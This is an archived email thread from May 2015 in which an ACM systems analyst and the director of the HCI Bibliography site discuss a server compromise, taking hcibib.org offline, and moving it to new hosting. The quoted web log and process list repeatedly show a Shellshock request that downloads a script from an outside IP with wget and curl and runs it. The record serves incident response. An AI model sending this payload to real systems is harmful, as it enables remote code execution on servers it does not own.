212-626-0573 >>>> greenberg@acm.org >>>> >>>> >>>> >>> >>> >> >> > -- > -- Ken Bauer (all other aliases end up in the same inbox) Blog: http://blog.kenbauer.me Academic Page: http://personal.gda.itesm.mx/kenbauer/ Social media contacts available through both sites if you want to follow me there. --001a113994542968a30515a6c3a6 Content-Type: text/html; charset=UTF-8 Content-Transfer-Encoding: quoted-printable
to connect to turing you need to make sure you are using s= sh on port 22


On Sat, May 9, 2015 at 9:11 AM, Gary PERLMAN &l= t;perlman@turin= g.acm.org> wrote:
File tra= nsfer via SSH keeps failing. Do you know what parameters I need to connect = to turing with FileZilla?


Gary

On Sat, 9 May 2015, Adam Greenberg wrote:

Ok. Great.
Let us know if you need any assistance.

Thanks
Adam

-----Original Message-----
From: Gary PERLMAN [mailto:perlman@turing.acm.org]
Sent: Saturday, May 09, 2015 9:59 AM
To: Adam Greenberg
Cc: Ken Bauer; ishelpdesk
Subject: RE: hcibib.org= website problem

I am very sorry to have been unwittingly invovled in shutting down acm.org!

I'm a little embarassed on this, but a move to a new hosting env has be= en "in the works" since at least last September, when I was given= an acocunt (p= erlman.hosting.acm.org). At the time, I was overwhelmed by the task, bu= t I think I can make progress.

I will work on the file transfers today.

Gary

On Sat, 9 May 2015, Adam Greenberg wrote:

Ok.=C2=A0 What I would like to do then, is move you off of this old turing = server and over to our newer hosting environment.
Ishelpdesk is copied on this, I'm asking for us to open a ticket to get= Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over= to the new server.
Once Gary checks to make sure it works correctly we can cut DNS over.
There are more filters and controls in place on the new environment, that w= ould help mitigate the issue should it happen again.
On the current server, this issue shut down this whole box, along with ACM&= #39;s main website, because it tied up the resources of this server.

Ishelpdesk, please proceed with getting an account setup for Gary, and sett= ing it up to support the hc= ibib.org website.

Thanks
Adam

-----Original Message-----
From: Gary PERLMAN [mailto:perlman@turing.acm.org]
Sent: Friday, May 08, 2015 6:50 PM
To: Adam Greenberg
Cc: Ken Bauer; ishelpdesk
Subject: Re: hcibib.org= website problem

Well, I am stumped. I don't know what script was used for the attack, a= nd if I did, I am not sure how I would prevent further attacks.

Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.org=C2=A0 http://hcibib.org/

On Wed, 6 May 2015, Adam Greenberg wrote:

Hello Gary,
I had to take the hcibib.or= g website offline tonight.=C2=A0 =C2=A0The site was used to execute a d= enial of service attack that took down the server.
Here is the reference from the hcibib.org weblogs

62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 2= 00 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh= /tmp/dd1.sh;wget = http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.= sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"

I put the entire weblog for today to your /home/Perlman

The request executed a denial of service attack that started this.
apache=C2=A0 =C2=A028593=C2=A0 =C2=A0 =C2=A01=C2=A0 0 12:12 ?=C2=A0 =C2=A0 = =C2=A0 =C2=A0 00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/d= d.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh &am= p; sh /tmp/dd1.sh 0>&1

Attached is a sample of what was running on the server.

I have changed the default document root of the website until I hear from y= ou.=C2=A0 I would prefer to bring the site back online restricted to the IP= address that you will be connecting from so that you have time to properly= examine you site and then we can open it back up.=C2=A0 Please let me know= the IP address you will be connecting from and I will make the appropriate= configuration changes.

Thanks
Adam


Adam Greenberg
Senior Systems Analyst
Association for Computing Machinery
2 Penn Plaza
Suite 701
New York, NY 10121
Office: 212-626-0573
greenberg@acm.org







--



--
--001a113994542968a30515a6c3a6-- From greenberg@hq.acm.org Sat May 9 10:16:26 2015 Return-Path: Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1bon0078.outbound.protection.outlook.com [157.56.111.78]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t49EGPZB009978 for ; Sat, 9 May 2015 10:16:25 -0400 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by CY1PR0501MB1834.namprd05.prod.outlook.com (25.163.141.148) with Microsoft SMTP Server (TLS) id 15.1.154.19; Sat, 9 May 2015 14:16:30 +0000 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id 15.01.0160.009; Sat, 9 May 2015 14:16:30 +0000 From: Adam Greenberg To: Gary PERLMAN CC: Ken Bauer , ishelpdesk Subject: RE: hcibib.org website problem Thread-Topic: hcibib.org website problem Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyAAAA8H4AAACiKJw== Date: Sat, 9 May 2015 14:16:29 +0000 Message-ID: References: , In-Reply-To: Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: authentication-results: turing.acm.org; dkim=none (message not signed) header.d=none; x-originating-ip: [98.15.179.72] x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1834; x-microsoft-antispam-prvs: x-exchange-antispam-report-test: UriScan:; x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:CY1PR0501MB1834;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1834; x-forefront-prvs: 05715BE7FD x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6019001)(269900001)(24454002)(43234003)(479174004)(51704005)(377454003)(110136002)(77156002)(2656002)(40100003)(62966003)(46102003)(122556002)(5001960100002)(99286002)(63666004)(189998001)(19580405001)(19617315012)(19625215002)(33646002)(15395725005)(16236675004)(87936001)(19580395003)(66066001)(76176999)(102836002)(95246002)(15975445007)(50986999)(54356999)(5890100001)(2900100001)(86362001)(2950100001)(92566002)(256605007);DIR:OUT;SFP:1101;SCL:1;SRVR:CY1PR0501MB1834;H:CY1PR0501MB1241.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en; Content-Type: multipart/alternative; boundary="_000_fexjkcj323dk2uk46n8iabre1431180981595emailandroidcom_" MIME-Version: 1.0 X-OriginatorOrg: hq.acm.org X-MS-Exchange-CrossTenant-originalarrivaltime: 09 May 2015 14:16:29.1494 (UTC) X-MS-Exchange-CrossTenant-fromentityheader: Hosted X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6 X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1834 Status: R X-Status: A X-Keywords: --_000_fexjkcj323dk2uk46n8iabre1431180981595emailandroidcom_ Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Filezilla to Turing is either sftp or ftp server turing.acm.org ports are = standard 22 for sftp and 21 for ftp Thanks Adam -------- Original message -------- From: Gary PERLMAN Date: 05/09/2015 10:12 AM (GMT-05:00) To: Adam Greenberg Cc: Ken Bauer , ishelpdesk Subject: RE: hcibib.org website problem File transfer via SSH keeps failing. Do you know what parameters I need to = connect to turing with FileZilla? Gary On Sat, 9 May 2015, Adam Greenberg wrote: > Ok. Great. > Let us know if you need any assistance. > > Thanks > Adam > > -----Original Message----- > From: Gary PERLMAN [mailto:perlman@turing.acm.org] > Sent: Saturday, May 09, 2015 9:59 AM > To: Adam Greenberg > Cc: Ken Bauer; ishelpdesk > Subject: RE: hcibib.org website problem > > I am very sorry to have been unwittingly invovled in shutting down acm.or= g! > > I'm a little embarassed on this, but a move to a new hosting env has been= "in the works" since at least last September, when I was given an acocunt = (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but = I think I can make progress. > > I will work on the file transfers today. > > Gary > > On Sat, 9 May 2015, Adam Greenberg wrote: > >> Ok. What I would like to do then, is move you off of this old turing se= rver and over to our newer hosting environment. >> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get = Gary Perlman setup on the new server, and all the files from the hcibib.org= website synced over to the new server. >> Once Gary checks to make sure it works correctly we can cut DNS over. >> There are more filters and controls in place on the new environment, tha= t would help mitigate the issue should it happen again. >> On the current server, this issue shut down this whole box, along with A= CM's main website, because it tied up the resources of this server. >> >> Ishelpdesk, please proceed with getting an account setup for Gary, and s= etting it up to support the hcibib.org website. >> >> Thanks >> Adam >> >> -----Original Message----- >> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >> Sent: Friday, May 08, 2015 6:50 PM >> To: Adam Greenberg >> Cc: Ken Bauer; ishelpdesk >> Subject: Re: hcibib.org website problem >> >> Well, I am stumped. I don't know what script was used for the attack, an= d if I did, I am not sure how I would prevent further attacks. >> >> Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.= org http://hcibib.org/ >> >> On Wed, 6 May 2015, Adam Greenberg wrote: >> >>> Hello Gary, >>> I had to take the hcibib.org website offline tonight. The site was us= ed to execute a denial of service attack that took down the server. >>> Here is the reference from the hcibib.org weblogs >>> >>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 107= 40 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://= 62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/d= d1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'" >>> >>> I put the entire weblog for today to your /home/Perlman >>> >>> The request executed a denial of service attack that started this. >>> apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf /tm= p/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http= ://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 >>> >>> Attached is a sample of what was running on the server. >>> >>> I have changed the default document root of the website until I hear fr= om you. I would prefer to bring the site back online restricted to the IP = address that you will be connecting from so that you have time to properly = examine you site and then we can open it back up. Please let me know the I= P address you will be connecting from and I will make the appropriate confi= guration changes. >>> >>> Thanks >>> Adam >>> >>> >>> Adam Greenberg >>> Senior Systems Analyst >>> Association for Computing Machinery >>> 2 Penn Plaza >>> Suite 701 >>> New York, NY 10121 >>> Office: 212-626-0573 >>> greenberg@acm.org >>> >>> >> >> > > -- --_000_fexjkcj323dk2uk46n8iabre1431180981595emailandroidcom_ Content-Type: text/html; charset="us-ascii" Content-Transfer-Encoding: quoted-printable
Filezilla to Turing is either sftp or ftp server turing.acm.org  = ports are standard 22 for sftp and 21 for ftp



Thanks
Adam


-------- Original message --------
From: Gary PERLMAN <perlman@turing.acm.org>
Date: 05/09/2015 10:12 AM (GMT-05:00)
To: Adam Greenberg <greenberg@hq.acm.org>
Cc: Ken Bauer <kenbauer@acm.org>, ishelpdesk <ishelpdesk@hq.acm.or= g>
Subject: RE: hcibib.org website problem

File transfer via SSH keeps failing. Do you know w= hat parameters I need to connect to turing with FileZilla?

Gary

On Sat, 9 May 2015, Adam Greenberg wrote:

> Ok. Great.
> Let us know if you need any assistance.
>
> Thanks
> Adam
>
> -----Original Message-----
> From: Gary PERLMAN [mailto:p= erlman@turing.acm.org]
> Sent: Saturday, May 09, 2015 9:59 AM
> To: Adam Greenberg
> Cc: Ken Bauer; ishelpdesk
> Subject: RE: hcibib.org website problem
>
> I am very sorry to have been unwittingly invovled in shutting down acm= .org!
>
> I'm a little embarassed on this, but a move to a new hosting env has b= een "in the works" since at least last September, when I was give= n an acocunt (perlman.hosting.acm.org). At the time, I was overwhelmed by t= he task, but I think I can make progress.
>
> I will work on the file transfers today.
>
> Gary
>
> On Sat, 9 May 2015, Adam Greenberg wrote:
>
>> Ok.  What I would like to do then, is move you off of this ol= d turing server and over to our newer hosting environment.
>> Ishelpdesk is copied on this, I'm asking for us to open a ticket t= o get Gary Perlman setup on the new server, and all the files from the hcib= ib.org website synced over to the new server.
>> Once Gary checks to make sure it works correctly we can cut DNS ov= er.
>> There are more filters and controls in place on the new environmen= t, that would help mitigate the issue should it happen again.
>> On the current server, this issue shut down this whole box, along = with ACM's main website, because it tied up the resources of this server. >>
>> Ishelpdesk, please proceed with getting an account setup for Gary,= and setting it up to support the hcibib.org website.
>>
>> Thanks
>> Adam
>>
>> -----Original Message-----
>> From: Gary PERLMAN [mail= to:perlman@turing.acm.org]
>> Sent: Friday, May 08, 2015 6:50 PM
>> To: Adam Greenberg
>> Cc: Ken Bauer; ishelpdesk
>> Subject: Re: hcibib.org website problem
>>
>> Well, I am stumped. I don't know what script was used for the atta= ck, and if I did, I am not sure how I would prevent further attacks.
>>
>> Gary Perlman, Director, HCI Bibliography Project mailto:director@hcibib.org  http://= hcibib.org/
>>
>> On Wed, 6 May 2015, Adam Greenberg wrote:
>>
>>> Hello Gary,
>>> I had to take the hcibib.org website offline tonight. &nb= sp; The site was used to execute a denial of service attack that took down = the server.
>>> Here is the reference from the hcibib.org weblogs
>>>
>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTT= P/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /= tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /t= mp/dd.sh;curl http://62.75.145.250/dd.sh -o /t= mp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'"
>>>
>>> I put the entire weblog for today to your /home/Perlman
>>>
>>> The request executed a denial of service attack that started t= his.
>>> apache   28593     1  0 12:= 12 ?        00:00:00 /bin/bash -c rm -rf= /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /t= mp/dd.sh;curl http://62.75.145.250/dd.sh -o /t= mp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1
>>>
>>> Attached is a sample of what was running on the server.
>>>
>>> I have changed the default document root of the website until = I hear from you.  I would prefer to bring the site back online restric= ted to the IP address that you will be connecting from so that you have tim= e to properly examine you site and then we can open it back up.  Please let me know the IP address you will be conne= cting from and I will make the appropriate configuration changes.
>>>
>>> Thanks
>>> Adam
>>>
>>>
>>> Adam Greenberg
>>> Senior Systems Analyst
>>> Association for Computing Machinery
>>> 2 Penn Plaza
>>> Suite 701
>>> New York, NY 10121
>>> Office: 212-626-0573
>>> greenberg@acm.org
>>>
>>>
>>
>>
>
>

--
--_000_fexjkcj323dk2uk46n8iabre1431180981595emailandroidcom_-- From greenberg@hq.acm.org Mon May 11 16:17:53 2015 Return-Path: Received: from na01-by2-obe.outbound.protection.outlook.com (mail-by2on0085.outbound.protection.outlook.com [207.46.100.85]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t4BKHqWX001581 for ; Mon, 11 May 2015 16:17:52 -0400 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by CY1PR0501MB1835.namprd05.prod.outlook.com (25.163.141.149) with Microsoft SMTP Server (TLS) id 15.1.154.19; Mon, 11 May 2015 20:17:56 +0000 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id 15.01.0160.009; Mon, 11 May 2015 20:17:57 +0000 From: Adam Greenberg To: Gary PERLMAN CC: Ken Bauer , ishelpdesk Subject: RE: hcibib.org website problem Thread-Topic: hcibib.org website problem Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyAAAA8H4AAACiKJwBwd5EAAACnqSA= Date: Mon, 11 May 2015 20:17:55 +0000 Message-ID: References: , In-Reply-To: Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: authentication-results: turing.acm.org; dkim=none (message not signed) header.d=none; x-originating-ip: [24.246.110.73] x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1835; x-microsoft-antispam-prvs: x-exchange-antispam-report-test: UriScan:; x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:CY1PR0501MB1835;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1835; x-forefront-prvs: 05739BA1B5 x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6009001)(6019001)(269900001)(479174004)(43234003)(24454002)(13464003)(377454003)(33656002)(2656002)(19580405001)(19580395003)(50986999)(76176999)(54356999)(40100003)(87936001)(99286002)(77156002)(62966003)(76576001)(5001920100001)(46102003)(189998001)(5001960100002)(110136002)(66066001)(102836002)(15395725005)(5890100001)(15975445007)(93886004)(92566002)(74316001)(86362001)(2950100001)(344275003);DIR:OUT;SFP:1101;SCL:1;SRVR:CY1PR0501MB1835;H:CY1PR0501MB1241.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en; Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 X-OriginatorOrg: hq.acm.org X-MS-Exchange-CrossTenant-originalarrivaltime: 11 May 2015 20:17:55.7238 (UTC) X-MS-Exchange-CrossTenant-fromentityheader: Hosted X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6 X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1835 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by turing.acm.org id t4BKHqWX001581 Status: R X-Status: A X-Keywords: Gary, I fixed the hosting for you. If you look in cpanel under "Add On Domains" I added hcibib.org and mapped it with a document root of /public_html/hcibib/ If you add this entry to your local hosts file 216.119.136.18 hcibib.org You can hit the site as hcibib.org without us modifying any DNS entries and opening it up right now. http://hcibib.org/index.html Once you think it's ready to go, let me know and I can change the DNS entries. We can leave the files in place on turing for now., that's not a problem. Thanks Adam -----Original Message----- From: Gary PERLMAN [mailto:perlman@turing.acm.org] Sent: Monday, May 11, 2015 3:57 PM To: Adam Greenberg Cc: Ken Bauer; ishelpdesk Subject: RE: hcibib.org website problem I'm getting close. I've transferred a lot of files over to perlman.hosting.acm.org and have made good progress getting things working. I'd like to go live for just my IP: 24.48.90.117 and I'd like hcibib.org to point to: /home/perlman/www/hcibib I disabled some scripts I suspect of being vulnerable to a backdoor attack, and I'm going to rework any before I activate them again. I'd like a few days of testing before opening up hcibib.org from its new home. I'd prefer that my old files on turing stick around for a while while I make sure that I've gotten everything. Gary On Sat, 9 May 2015, Adam Greenberg wrote: > Filezilla to Turing is either sftp or ftp server turing.acm.org ports > are standard 22 for sftp and 21 for ftp > > > > Thanks > Adam > > > -------- Original message -------- > From: Gary PERLMAN > Date: 05/09/2015 10:12 AM (GMT-05:00) > To: Adam Greenberg > Cc: Ken Bauer , ishelpdesk > Subject: RE: hcibib.org website problem > > File transfer via SSH keeps failing. Do you know what parameters I need to connect to turing with FileZilla? > > Gary > > On Sat, 9 May 2015, Adam Greenberg wrote: > >> Ok. Great. >> Let us know if you need any assistance. >> >> Thanks >> Adam >> >> -----Original Message----- >> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >> Sent: Saturday, May 09, 2015 9:59 AM >> To: Adam Greenberg >> Cc: Ken Bauer; ishelpdesk >> Subject: RE: hcibib.org website problem >> >> I am very sorry to have been unwittingly invovled in shutting down acm.org! >> >> I'm a little embarassed on this, but a move to a new hosting env has been "in the works" since at least last September, when I was given an acocunt (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but I think I can make progress. >> >> I will work on the file transfers today. >> >> Gary >> >> On Sat, 9 May 2015, Adam Greenberg wrote: >> >>> Ok. What I would like to do then, is move you off of this old turing server and over to our newer hosting environment. >>> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server. >>> Once Gary checks to make sure it works correctly we can cut DNS over. >>> There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again. >>> On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server. >>> >>> Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website. >>> >>> Thanks >>> Adam >>> >>> -----Original Message----- >>> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >>> Sent: Friday, May 08, 2015 6:50 PM >>> To: Adam Greenberg >>> Cc: Ken Bauer; ishelpdesk >>> Subject: Re: hcibib.org website problem >>> >>> Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks. >>> >>> Gary Perlman, Director, HCI Bibliography Project >>> mailto:director@hcibib.org http://hcibib.org/ >>> >>> On Wed, 6 May 2015, Adam Greenberg wrote: >>> >>>> Hello Gary, >>>> I had to take the hcibib.org website offline tonight. The site was used to execute a denial of service attack that took down the server. >>>> Here is the reference from the hcibib.org weblogs >>>> >>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'" >>>> >>>> I put the entire weblog for today to your /home/Perlman >>>> >>>> The request executed a denial of service attack that started this. >>>> apache 28593 1 0 12:12 ? 00:00:00 /bin/bash -c rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1 >>>> >>>> Attached is a sample of what was running on the server. >>>> >>>> I have changed the default document root of the website until I hear from you. I would prefer to bring the site back online restricted to the IP address that you will be connecting from so that you have time to properly examine you site and then we can open it back up. Please let me know the IP address you will be connecting from and I will make the appropriate configuration changes. >>>> >>>> Thanks >>>> Adam >>>> >>>> >>>> Adam Greenberg >>>> Senior Systems Analyst >>>> Association for Computing Machinery >>>> 2 Penn Plaza >>>> Suite 701 >>>> New York, NY 10121 >>>> Office: 212-626-0573 >>>> greenberg@acm.org >>>> >>>> >>> >>> >> >> > > -- > -- From greenberg@hq.acm.org Wed May 13 10:15:47 2015 Return-Path: Received: from na01-bn1-obe.outbound.protection.outlook.com (mail-bn1bon0071.outbound.protection.outlook.com [157.56.111.71]) by turing.acm.org (8.13.1/8.13.1) with ESMTP id t4DEFkme010632 for ; Wed, 13 May 2015 10:15:47 -0400 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com (25.160.225.152) by CY1PR0501MB1836.namprd05.prod.outlook.com (25.163.141.15) with Microsoft SMTP Server (TLS) id 15.1.154.19; Wed, 13 May 2015 14:15:51 +0000 Received: from CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) by CY1PR0501MB1241.namprd05.prod.outlook.com ([25.160.225.152]) with mapi id 15.01.0160.009; Wed, 13 May 2015 14:15:51 +0000 From: Adam Greenberg To: Gary PERLMAN CC: Ken Bauer , ishelpdesk Subject: RE: hcibib.org website problem Thread-Topic: hcibib.org website problem Thread-Index: AdCIVAQwEwjlfZlbTOO9JKrPpQ0dMgBjVrqAAAoUmrAAFaRiAAAAOgyAAAA8H4AAACiKJwBwd5EAAACnqSAAVoCYgAABa8yQ Date: Wed, 13 May 2015 14:15:50 +0000 Message-ID: References: , In-Reply-To: Accept-Language: en-US Content-Language: en-US X-MS-Has-Attach: X-MS-TNEF-Correlator: authentication-results: turing.acm.org; dkim=none (message not signed) header.d=none; x-originating-ip: [98.15.179.72] x-microsoft-antispam: UriScan:;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1836; x-microsoft-antispam-prvs: x-exchange-antispam-report-test: UriScan:; x-exchange-antispam-report-cfa-test: BCL:0;PCL:0;RULEID:(601004)(5005006)(3002001);SRVR:CY1PR0501MB1836;BCL:0;PCL:0;RULEID:;SRVR:CY1PR0501MB1836; x-forefront-prvs: 0575F81B58 x-forefront-antispam-report: SFV:NSPM;SFS:(10009020)(6009001)(6019001)(269900001)(377454003)(43234003)(24454002)(479174004)(51704005)(13464003)(74316001)(102836002)(15975445007)(93886004)(86362001)(92566002)(77156002)(62966003)(15395725005)(2950100001)(2900100001)(40100003)(46102003)(66066001)(189998001)(2656002)(87936001)(76576001)(5890100001)(99286002)(110136002)(5001960100002)(33656002)(54356999)(50986999)(76176999)(19580395003)(19580405001)(122556002)(344275003);DIR:OUT;SFP:1101;SCL:1;SRVR:CY1PR0501MB1836;H:CY1PR0501MB1241.namprd05.prod.outlook.com;FPR:;SPF:None;MLV:sfv;LANG:en; Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 X-OriginatorOrg: hq.acm.org X-MS-Exchange-CrossTenant-originalarrivaltime: 13 May 2015 14:15:50.9353 (UTC) X-MS-Exchange-CrossTenant-fromentityheader: Hosted X-MS-Exchange-CrossTenant-id: 70f11c93-becb-4ae4-8dcc-9efc90fc7ad6 X-MS-Exchange-Transport-CrossTenantHeadersStamped: CY1PR0501MB1836 Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by turing.acm.org id t4DEFkme010632 Status: R X-Status: A X-Keywords: Gary, I made the DNS changes for the website. One question, what would you like to do about the email? Do you have a gmail address you would like us to point the domain to? And the mail for the @acm.org address that you have going to perlman@turing.acm.org? You can use the email functionality within the Perlman.hosting.acm.org account. It's configurable in cpanel. Let me know. Thanks Adam -----Original Message----- From: Gary PERLMAN [mailto:perlman@turing.acm.org] Sent: Wednesday, May 13, 2015 9:32 AM To: Adam Greenberg Cc: Ken Bauer; ishelpdesk Subject: RE: hcibib.org website problem I'm ready to go live. I still have some things to fix, but the core funcitonlaity is working. Gary On Mon, 11 May 2015, Adam Greenberg wrote: > Gary, > I fixed the hosting for you. If you look in cpanel under "Add On Domains" > I added hcibib.org and mapped it with a document root of > /public_html/hcibib/ > > If you add this entry to your local hosts file > 216.119.136.18 hcibib.org > You can hit the site as hcibib.org without us modifying any DNS entries and opening it up right now. > > http://hcibib.org/index.html > > Once you think it's ready to go, let me know and I can change the DNS entries. > > We can leave the files in place on turing for now., that's not a problem. > > Thanks > Adam > > -----Original Message----- > From: Gary PERLMAN [mailto:perlman@turing.acm.org] > Sent: Monday, May 11, 2015 3:57 PM > To: Adam Greenberg > Cc: Ken Bauer; ishelpdesk > Subject: RE: hcibib.org website problem > > I'm getting close. I've transferred a lot of files over to perlman.hosting.acm.org and have made good progress getting things working. I'd like to go live for just my IP: > 24.48.90.117 > and I'd like hcibib.org to point to: > /home/perlman/www/hcibib > I disabled some scripts I suspect of being vulnerable to a backdoor attack, and I'm going to rework any before I activate them again. > > I'd like a few days of testing before opening up hcibib.org from its new home. > I'd prefer that my old files on turing stick around for a while while I make sure that I've gotten everything. > > Gary > > On Sat, 9 May 2015, Adam Greenberg wrote: > >> Filezilla to Turing is either sftp or ftp server turing.acm.org >> ports are standard 22 for sftp and 21 for ftp >> >> >> >> Thanks >> Adam >> >> >> -------- Original message -------- >> From: Gary PERLMAN >> Date: 05/09/2015 10:12 AM (GMT-05:00) >> To: Adam Greenberg >> Cc: Ken Bauer , ishelpdesk >> Subject: RE: hcibib.org website problem >> >> File transfer via SSH keeps failing. Do you know what parameters I need to connect to turing with FileZilla? >> >> Gary >> >> On Sat, 9 May 2015, Adam Greenberg wrote: >> >>> Ok. Great. >>> Let us know if you need any assistance. >>> >>> Thanks >>> Adam >>> >>> -----Original Message----- >>> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >>> Sent: Saturday, May 09, 2015 9:59 AM >>> To: Adam Greenberg >>> Cc: Ken Bauer; ishelpdesk >>> Subject: RE: hcibib.org website problem >>> >>> I am very sorry to have been unwittingly invovled in shutting down acm.org! >>> >>> I'm a little embarassed on this, but a move to a new hosting env has been "in the works" since at least last September, when I was given an acocunt (perlman.hosting.acm.org). At the time, I was overwhelmed by the task, but I think I can make progress. >>> >>> I will work on the file transfers today. >>> >>> Gary >>> >>> On Sat, 9 May 2015, Adam Greenberg wrote: >>> >>>> Ok. What I would like to do then, is move you off of this old turing server and over to our newer hosting environment. >>>> Ishelpdesk is copied on this, I'm asking for us to open a ticket to get Gary Perlman setup on the new server, and all the files from the hcibib.org website synced over to the new server. >>>> Once Gary checks to make sure it works correctly we can cut DNS over. >>>> There are more filters and controls in place on the new environment, that would help mitigate the issue should it happen again. >>>> On the current server, this issue shut down this whole box, along with ACM's main website, because it tied up the resources of this server. >>>> >>>> Ishelpdesk, please proceed with getting an account setup for Gary, and setting it up to support the hcibib.org website. >>>> >>>> Thanks >>>> Adam >>>> >>>> -----Original Message----- >>>> From: Gary PERLMAN [mailto:perlman@turing.acm.org] >>>> Sent: Friday, May 08, 2015 6:50 PM >>>> To: Adam Greenberg >>>> Cc: Ken Bauer; ishelpdesk >>>> Subject: Re: hcibib.org website problem >>>> >>>> Well, I am stumped. I don't know what script was used for the attack, and if I did, I am not sure how I would prevent further attacks. >>>> >>>> Gary Perlman, Director, HCI Bibliography Project >>>> mailto:director@hcibib.org http://hcibib.org/ >>>> >>>> On Wed, 6 May 2015, Adam Greenberg wrote: >>>> >>>>> Hello Gary, >>>>> I had to take the hcibib.org website offline tonight. The site was used to execute a denial of service attack that took down the server. >>>>> Here is the reference from the hcibib.org weblogs >>>>> >>>>> 62.75.145.250 - - [06/May/2015:12:12:39 -0400] "GET / HTTP/1.1" 200 10740 "-" "() { :; }; /bin/bash -c 'rm -rf /tmp/dd.sh /tmp/dd1.sh;wget http://62.75.145.250/dd.sh -O /tmp/dd.sh;curl http://62.75.145.250/dd.sh -o /tmp/dd1.sh;sh /tmp/dd.sh & sh /tmp/dd1.sh 0>&1'" >>>>> >>>>> I put the entire 